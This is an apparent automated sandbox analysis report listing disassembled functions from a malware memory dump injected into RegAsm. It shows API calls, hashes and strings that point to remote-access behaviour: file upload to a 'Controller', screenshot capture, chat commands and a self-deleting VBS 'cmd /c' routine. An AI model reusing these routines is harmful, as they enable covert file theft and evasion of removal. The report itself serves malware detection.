Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

Uploading file to Controller: , xrefs: 00408DD5
NG, xrefs: 00408C17
SetFilePointerEx error, xrefs: 00408FD4
ReadFile error, xrefs: 00408FC8

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 10007D06

Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF

_free.LIBCMT ref: 10007CFB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10007D1D
_free.LIBCMT ref: 10007D32
_free.LIBCMT ref: 10007D3D
_free.LIBCMT ref: 10007D5F
_free.LIBCMT ref: 10007D72
_free.LIBCMT ref: 10007D80
_free.LIBCMT ref: 10007D8B
_free.LIBCMT ref: 10007DC3
_free.LIBCMT ref: 10007DCA
_free.LIBCMT ref: 10007DE7
_free.LIBCMT ref: 10007DFF

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

exepath, xrefs: 0040D831
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
""", 0, xrefs: 0040D8E1
.vbs, xrefs: 0040D85F
8SG, xrefs: 0040D80F
open, xrefs: 0040D9B2
Temp, xrefs: 0040D89A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
CloseHandle.KERNEL32(?), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32 ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

`&G, xrefs: 00450C34
\&G, xrefs: 00450C24
\&G, xrefs: 00450C1C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

65535, xrefs: 00414BB3
udp, xrefs: 00414C60, 00414C68, 00414C6C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Function 00419FB4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129
8.v, xrefs: 0041A016, 0041A0C9, 0041A1AD
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: 8.v$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-2336697609
Opcode ID: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32 ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32 ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
CloseChat, xrefs: 00405609
GetMessage, xrefs: 004055F8

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 85aad4114a9f57f0a494b3b7093deb65c111f439e4d4c47bc4dc20eb9937df87
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: 85aad4114a9f57f0a494b3b7093deb65c111f439e4d4c47bc4dc20eb9937df87
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

0VG, xrefs: 00417DB5
Temp, xrefs: 00417D00
0VG, xrefs: 00417E21
@, xrefs: 00417D8A
<, xrefs: 00417D83

Memory Dump Source

